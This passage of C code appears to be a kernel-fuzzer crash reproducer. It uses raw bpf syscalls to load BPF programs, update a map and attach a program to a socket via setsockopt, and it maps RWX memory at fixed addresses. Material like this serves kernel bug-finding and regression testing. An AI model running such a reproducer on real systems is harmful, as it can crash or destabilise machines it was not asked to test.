"\x8b\x52\x3e\x66\x9d\xa3\x50\xe3\xec\x74\x45\xdf\xbf\x36\x6b\x0b\x3b" "\xc5\xe7\x68\x24\xa1\xe4\x3e\xaa\xec\xa7\x0d\xb9\x0f\x2f\xa3\x95\x96" "\x44\x34\x47\x67\x19\x33\x07\x9a\x24\xfe\x36\x81\xad\x9a\xc3\x61\xf7" "\x1a\xc2\x79\xa6\x88\xf1\x0a\x12\x10\x5e\xde\xbc\x5e\x3b\x8d\xad\x4c" "\x83\x05\xab\x12\x9c\xa2\xdf\xb9\xb7\xc5\xe9\xd0\x97\xbd\x01\xb4\x95" "\xcc\xce\xfd\xdc\xe5\x69\x11\x7f\x7f\x5d\x6a\x62\x70\xff\x0f\x0f\x4c" "\x37\x10\x29\xca\x84\x89\x57\x1b\x55\x84\x1b\xf3\xdd\x00\x3b\xc8\x14" "\x60\xee\xe5\x7c\xeb\x3c\x33\xf4\xe9\x30\x0b\x01\x44\xfe\x04\x0c\xf5" "\xfc\xfc\xbb\x61\x6c\x20\x70\x23\x78\x81\xaf\xdb\x31\x4c\xec\xd1\x62" "\x3f\x3e\x55\xab\x8b\x76\x27\xfa\x1b\xe3\x49\x14\x5a\x8d\x63\x13\xcb" "\xc7\x90\xee\xfe\x20\x20\x13\x8e\x82\xfb\x9d\x35\x1b\xe4\xdd\xcb\xcc" "\x9b\xc0\x48\xdd\x3d\xb5\x82\x8d\x16\xba\xec\x6e\x07\xa0\x07\xf0\x03" "\x0f\x34\xea\x3c\xfd\x52\x4d\x6f\xa1\xd4\x5d\xa5\x64\x1d\x6c\x94\xe1" "\xd3\xae\x7f\xba\x1c\x85\x03\x5d\x2a\x60\xef\x16\x96\xe0\xd9\x6a\xa1" "\xc6\x00\x19\xf7\x3a\xe0\xaa\x61\x13\xcd\x66\xef\x26\xb5\x77\x73\x37" "\xc2\x6e\x14\x61\x40\x5d\x86\xfd\xf0\x91\xed\xd5\x26\xf2\x5c\xad\xa4" "\x39\xbb\x36\x09\xed\x5c\x35\xab\x60\xa5\x39\xad\xe7\x86\xbd\x60\x04" "\xd0\xea\x3e\xdb\xd6\xc4\xda\x0d\x8e\x8b\xe8\xc7\x71\xc8\xc8\xa0\xb0" "\x7d\x98\x59\xe0\x4a\xdb\x18\x96\x4d\xcc\xe9\xbc\xe5\x46\x07\x4c\x26" "\xdf\xfb\xc2\xdf\x37\x2a\x01\x6e\x8c\x84\x5d\x42\x57\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x96\x57" "\x69\x7d\x9c\x2b\x13\x2b\x2d\xc2\xf5\xea\x51\x22\x83\x65\x82\xa7\xe8" "\x5f\xe2\xbc\x16\x6f\x17\xae\xfd\x9d\x86\x1d\xe0\x19\x1f\x52\x77\xd4" "\xa3\xb5\xaf\xb6\xf2\x00\x00\x00\x00\x00\x00\x00\x00\x00\x89\xde\x7f" "\x84\x85\xd9\x50\x71\x64\xa1\x87\x22\x0b\x36\xdd\xc7\xfa\x64\x5d\x4b" "\xd0\xc1\x41\x4c\x30\xa4\x16", 3441); *(uint64_t*)0x20000090 = 0x20000140; memcpy((void*)0x20000140, "GPL\000", 4); *(uint32_t*)0x20000098 = 0; *(uint32_t*)0x2000009c = 0; *(uint64_t*)0x200000a0 = 0; *(uint32_t*)0x200000a8 = 0; *(uint32_t*)0x200000ac = 0; memset((void*)0x200000b0, 0, 16); *(uint32_t*)0x200000c0 = 0; *(uint32_t*)0x200000c4 = 0; *(uint32_t*)0x200000c8 = -1; *(uint32_t*)0x200000cc = 8; *(uint64_t*)0x200000d0 = 0x20000000; *(uint32_t*)0x20000000 = 0; *(uint32_t*)0x20000004 = 0; *(uint32_t*)0x200000d8 = 0xfffffe89; *(uint32_t*)0x200000dc = 0x10; *(uint64_t*)0x200000e0 = 0; *(uint32_t*)0x200000e8 = 0; *(uint32_t*)0x200000ec = 0; *(uint32_t*)0x200000f0 = -1; *(uint32_t*)0x200000f4 = 0; *(uint64_t*)0x200000f8 = 0; *(uint64_t*)0x20000100 = 0; *(uint32_t*)0x20000108 = 0x10; *(uint32_t*)0x2000010c = 0; *(uint32_t*)0x20000110 = 0; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000080ul, /*size=*/0x48ul); if (res != -1) r[2] = res; break; case 3: *(uint32_t*)0x20000200 = r[1]; *(uint64_t*)0x20000208 = 0x20000000; *(uint32_t*)0x20000000 = 0; *(uint64_t*)0x20000210 = 0x20000140; *(uint32_t*)0x20000140 = r[2]; *(uint64_t*)0x20000218 = 0; syscall(__NR_bpf, /*cmd=*/2ul, /*arg=*/0x20000200ul, /*size=*/0x20ul); break; case 4: *(uint32_t*)0x20000880 = 1; *(uint32_t*)0x20000884 = 8; *(uint64_t*)0x20000888 = 0x20000180; memcpy((void*)0x20000180, "\x18\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x18\x12\x00\x00", 20); *(uint32_t*)0x20000194 = r[1]; memcpy( (void*)0x20000198, "\x00\x00\x00\x00\x00\x00\x00\x00\xb7\x03\x00\x00\x00\x00\x00\x00\x85" "\x00\x00\x00\x0c\x00\x00\x00\xb7\x00\x00\x00\x20\x00\x00\x00\x95", 33); *(uint64_t*)0x20000890 = 0x20000980; memcpy((void*)0x20000980, "GPL\000", 4); *(uint32_t*)0x20000898 = 0; *(uint32_t*)0x2000089c = 0; *(uint64_t*)0x200008a0 = 0; *(uint32_t*)0x200008a8 = 0; *(uint32_t*)0x200008ac = 0; memset((void*)0x200008b0, 0, 16); *(uint32_t*)0x200008c0 = 0; *(uint32_t*)0x200008c4 = 0; *(uint32_t*)0x200008c8 = -1; *(uint32_t*)0x200008cc = 0; *(uint64_t*)0x200008d0 = 0; *(uint32_t*)0x200008d8 = 0; *(uint32_t*)0x200008dc = 0; *(uint64_t*)0x200008e0 = 0; *(uint32_t*)0x200008e8 = 0; *(uint32_t*)0x200008ec = 0; *(uint32_t*)0x200008f0 = 0; *(uint32_t*)0x200008f4 = 0; *(uint64_t*)0x200008f8 = 0; *(uint64_t*)0x20000900 = 0; *(uint32_t*)0x20000908 = 0; *(uint32_t*)0x2000090c = 0; *(uint32_t*)0x20000910 = 0; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000880ul, /*size=*/0x90ul); if (res != -1) r[3] = res; break; case 5: *(uint32_t*)0x200000c0 = r[3]; syscall(__NR_setsockopt, /*fd=*/r[0], /*level=*/1, /*optname=*/0x32, /*optval=*/0x200000c0ul, /*optlen=*/4ul); break; } } int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/-1, /*offset=*/0ul); const char* reason; (void)reason; use_temporary_dir(); loop(); return 0; }